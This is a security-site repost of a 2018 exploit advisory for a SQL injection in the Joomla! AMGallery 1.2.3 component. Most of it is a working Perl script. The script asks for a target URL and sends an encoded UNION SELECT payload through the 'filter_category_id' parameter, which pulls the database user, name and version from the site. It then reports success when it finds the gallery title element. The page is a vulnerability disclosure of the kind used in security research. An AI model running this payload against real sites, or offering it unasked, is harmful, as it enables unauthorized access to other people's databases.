首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection
来源:ihsan.net 作者:Sencan 发布时间:2018-09-25  
# Exploit Title: Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection
# Exploit Author: Ihsan Sencan
# Dork: N/A
# Date: 2018-09-18
# Vendor Homepage: http://arenam.ru/
# Software Link: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/amgallery/
# Version: 1.2.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
 
# # # # #
# POC:
#
# 1)
# # # # #
 
#!/usr/bin/perl -w
# # # # #
 
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "
################################################################################
        ______  _______ ___    _   __   _____ _______   ___________    _   __
       /  _/ / / / ___//   |  / | / /  / ___// ____/ | / / ____/   |  / | / /
       / // /_/ /\__ \/ /| | /  |/ /   \__ \/ __/ /  |/ / /   / /| | /  |/ /
     _/ // __  /___/ / ___ |/ /|  /   ___/ / /___/ /|  / /___/ ___ |/ /|  /
    /___/_/ /_//____/_/  |_/_/ |_/   /____/_____/_/ |_/\____/_/  |_/_/ |_/
                                       
                                       +                                    
                Joomla! Component AMGallery 1.2.3 - SQL Injection         
################################################################################
";
 
use LWP::UserAgent;
print "\nTarget:[http://site.com/path/]: ";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress.....\n";
print "\n";
$efe="%2d%36%36%36%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%23";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0');
$host = $target . "?filter_category_id=".$efe."";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/<h2 class="amGalleryCatTitle">(.*?)<\/h2>/){
print "[+] Success !!!\n";
print "\n[+] Detail : $1\n";
print "\n";
}
else{print "\n[-]Not found.\n";
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·udisks2 2.8.0 - Denial of Serv
·Termite 3.4 - Denial of Servic
·LG SuperSign EZ CMS 2.5 - Remo
·SoftX FTP Client 3.3 - Denial
·NICO-FTP 3.0.1.19 - Buffer Ove
·Beyond Remote 2.2.5.3 - Denial
·LG SuperSign EZ CMS 2.5 - Loca
·Microsoft Windows ALPC Task Sc
·NUUO NVRMini2 3.8 - 'cgi_syste
·Solaris EXTREMEPARR dtappgathe
·Easy PhoroResQ 1.0 - Buffer Ov
·Solaris libnspr NSPR_LOG_FILE
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved